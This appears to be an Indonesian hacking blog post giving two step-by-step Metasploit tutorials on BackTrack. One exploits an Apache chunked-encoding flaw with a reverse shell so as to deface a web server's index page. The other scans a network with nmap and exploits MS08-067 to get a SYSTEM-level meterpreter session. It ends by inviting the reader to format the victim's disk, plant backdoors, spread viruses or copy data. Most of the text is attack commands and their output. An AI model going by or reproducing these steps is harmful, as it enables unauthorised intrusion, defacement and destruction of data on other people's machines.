Defacing Menggunakan Metasploit Di Bactrack


  1. Seperti biasa, masuk console aja. Next ketik msfconsole
    root@bt:/# msfconsole
  1. Setelah agak lama masuk juga di msfconsole, kemudian ketik show exploits
    msf > show exploits

    Metasploit Framework Loaded Exploits
    ====================================
    Credits Metasploit Framework Credits

    afp_loginext AppleFileServer LoginExt PathName Buffer Overflow
    apache_chunked_win32 Apache Win32 Chunked Encoding
    blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow
    distcc_exec DistCC Daemon Command Execution
    exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow
    frontpage_fp30reg_chunked Frontpage fp30reg.dll Chunked Encoding
    ia_webmail IA WebMail 3.x Buffer Overflow
    iis50_nsiislog_post IIS 5.0 nsiislog.dll POST Overflow
    iis50_printer_overflow IIS 5.0 Printer Buffer Overflow
    iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow


    Jadi disini kita bisa melihat daftar exploit pada Metasploit. salah satu yang akan kita gunakan adalah exploit nomor 2 dari atas, yakni: apache_chunked_win32
  2. Lanjut dengan pake salah satu exploit diatas 
    msf > use apache_chunked_win32
    msf apache_chunked_win32 >
  3. Sebagaimana yang terlihat pada prompt akan berubah menjadi msf apache_chunked_win32>dengan prompt ini kita dapat melihat berbagai opsi exploit jenis ini, silakan ketik perintah dibawah ini:
    msf apache_chunked_win32 > show options

    Exploit Options
    ===============
    Exploit: Name Default Description
    -------- ------ ------- ------------------
    optional SSL Use SSL
    required RHOST The target address
    required RPORT 80 The target port
    Target: Windows NT/2K Brute Force

    msf apache_chunked_win32 >
  4. Sekarang kita balik ke prompt semula, dan daftar opsi yang kita perlu isi seperti remote host IP address target, seperti contoh dibawah ini :
    msf apache_chunked_win32 > set RHOST 192.168.1.101
    RHOST -> 192.168.1.101
    msf apache_chunked_win32 >
  5. Disini kita dapat melihat berbagai opsi yang kita perlukan sebelum menggunakan exploit ini guna mendapatkan akses tingkat sistem. Dalam kasus ini saya menggunakan perintah berikut untuk melihat apakah opsi payloads bisa digunakan?

    msf apache_chunked_win32 > show payloads

    Metasploit Framework Usable Payloads
    ====================================
    win32_bind Windows Bind Shell
    win32_bind_dllinject Windows Bind DLL Inject
    win32_bind_stg Windows Staged Bind Shell
    win32_bind_stg_upexec Windows Staged Bind Upload/Execute
    win32_bind_vncinject Windows Bind VNC Server DLL Inject
    win32_reverse Windows Reverse Shell
    win32_reverse_dllinject Windows Reverse DLL Inject
    win32_reverse_stg Windows Staged Reverse Shell
    win32_reverse_stg_ie Windows Reverse InlineEgg Stager
    win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
    win32_reverse_vncinject Windows Reverse VNC Server DLL Inject
    msf apache_chunked_win32 >


    Opsi ini merupakan bagian dari Metasploit Framework, yang memungkinkan anda menggunakan “egg” apapun yang anda pilih. Egg disini adalah apapun payload yang akan anda eksekusi pada komputer korban. Pilihan ini merupakan hal umum dalam penggunaan security tool.
  6. Dari apa yang kita lihat diatas ada suatu kelebihan dari opsi yang ada pada kami. Dalam kasus ini kita akan menggunakan win32_reverse payload. Mengapa? baiklah kita menginginkan shell yang bisa kita gunakan untuk mengangkut materi bolak-balik. Tepatnya kita ingin meng-copy file index.html, dan membuat beberapa modifikasi alias Deface. Hanya dengan shell itulah kita dapat melakukannya. Harap diperhatikan bahwa kita perlu memberitahu Framework tersebut bahwa kita ingin opsi payload tersebut. Berikut ini syntax-nya:

    msf apache_chunked_win32 > set PAYLOAD win32_reverse
    PAYLOAD -> win32_reverse
    msf apache_chunked_win32(win32_reverse) >
  7. Jadi kita sekarang telah menentukan payload dan telah menjadi prompt dibelakangnya. Apa selanjutnya? Hmm… kita perlu menentukan IP address untuk menerima reverse shell tersebut. Ingatlah kembali beberapa langkah sebelumnya saat kita mengeset RHOST untuk menentukan mesin korban? Kita juga perlu melakukan hal yang sama untuk menentukan receiving host. Silakan lihat perintahnya dibawah ini:

    msf apache_chunked_win32(win32_reverse) > set LHOST 192.168.1.102
    LHOST -> 192.168.1.102
    msf apache_chunked_win32(win32_reverse) >
  8. Sekarang saatnya kita menjalankan exploit. Syntaknya adalah sebagai berikut:

    msf apache_chunked_win32(win32_reverse) > exploit 192.168.1.101
    Starting Reverse Handler.
    Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 348...
    Trying to exploit Windows NT using return 0x1c0f1022 with padding of 348...
    Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 352...
    Trying to exploit Windows NT using return 0x1c0f1022 with padding of 352...
    Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 356...
    Trying to exploit Windows NT using return 0x1c0f1022 with padding of 356...
    Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 360...
    Got connection from 192.168.1.101:1031
     
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\Program Files\Apache Group\Apache>
  9. Nah Kita sudah Masuk tuh Ke shell webservernya target........
    kita mau apain aja terserah.....


    Gunakan Pelajaran ini untuk kebaikan,,,,bukan untuk keisengan,kebencian ataupun kesenangan,,,,!!!

Exploit Windows With Metasploit - Backtrack

Kembali lagi ke backtrack hacking tutorial :D
Ayo bagi yang pengen tau tentang dunia Hacking jangan pusing lagi karena penasaran ini itu tentang Metasploit - Back|Track. lansung aja liat Cuplikan dibawah ini.... Selamat Menikmati....

Kita akan coba exploit windows xp menggunakan Metasploit yang ada di Backtrack...
Males basa basi...langsung aja hehe...

Pertama kita scan IP dan Port yang terbuka pada jaringan menggunakan nmap (sudah ada d backtrack 5),
* buka terminal ketik perintah nmap -sn 192.168.0.1-255
-sn adalah perintah nmap untuk melakukan scanning IP yang aktif / tidak..
-192.168.0.1-255 adalah IP yang akan kita scan, dari 192.168.0.1 sampai 192.168.0.255
jadi untuk IP nya di sesuaikan dengan IP anda..

*lalu jika sudah menemukan IP yang aktif kita scan Port yang terbuka pada target..contoh saya mendapakan IP 192.168.0.4 lakukab perintah nmap -f 192.168.0.4
-f adalah fast scanning sehingga nmap akan melakukan scanning secepat mungkin...
lihat hasilnya
























Jelas terlihat port 445 terbuka , langsung saja buka msfconsole atau Metasploit Framework versi console..
- ketik perintah msfconsole pada terminal/console..
tunggu biasanya agak lama...
- setelah terbuka ketik search netapi dan setelah itu kita gunakan yang exploit/windows/smb/ms08_067_netapi
- ketik perintah use exploit/windows/smb/ms08_067_netapi
- ketik show options untuk melihat opsi apa yang harus kita isi..























- RHOST belum kita setting ketik RHOST dengan ip target lakukan perintah set RHOST 192.168.0.4 ( jika ip target 192.168.0.4 )
set LHOST 192.168.0.3 ( 192.168.0.3 adalah ip saya )
set LPORT 4444 ( port pada Backtrack )
set PAYLOAD windows/meterpreter/reverse_tcp
- jalankan exploit dengan perintah exploit
dan hasilnya























Kita sudah masuk pada Meterpreter :D
Sekarang kita akan mengendalikan Command Prompt ( CMD ) korban , tapi sebelumnya kita lihat dulu posisi kita...

pertama kita lihat siapa kita, dengan perintah getuid, dan outputnya NT AUTHORITY\SYSTEM , tapi bagaimana jika bukan NT AUTHORITY\SYSTEM alias si korban tidak menjalankan sebagai administrator pada komputernya? kita lakukan ketik perintah getsystem , lalu cek lagi dengan perintah getuid jika sudah NT AUTHORITY\SYSTEM lanjutkan...
kita ketik perintah pwd untuk cek keberadaan kita dan pada output saya adalah C:\WINDOWS\system32 langsung ketik perintah shell untuk eksekusi CMD..dan hasilnya






















tapi bagaimana jika ternyata error? tidak seperti di atas saat,error memasukan perintah shell...atau saat memasukan perintah shell tidak ke C:\Windows\system32 ???
mungkin procces dirrectory nya tidak tepat...
jika masalah seperti itu lakukan perintah migrate...kita akan berpindah..
ketik perintah ps pada meterpreter untuk melihat process ID yang ada...
setelah keluar kita  cari PID svchost.exe, jika sudah ketemu pindahlah dengan perintah migrate 
contoh : migrate 1328
jika sukses, cek dengan perintah pwd , lalu jalankan perintah shell..
lihat gambar :





jika sudah berada di C:\Windows\system32> berarti masalah beres, kita lanjutkan....



Apa yang akan kita lakukan setelah kita berada pada saat sudah berada pada Metterpreter ataupun Command Prompt korban??
terserah anda..
mau Format Harddisk korban,shutdown,pasang backdoor,sebarin virus,copy data apalah terserah mau Remmote Desktop jg g ada yang larang :p

sekian , d tutorial selanjutnya mungkin akan saya bahas tentang salah satu cara diatas...
 
Free Website templatesfreethemes4all.comFree Blog TemplatesLast NewsFree CMS TemplatesFree CSS TemplatesFree Soccer VideosFree Wordpress ThemesFree Web Templates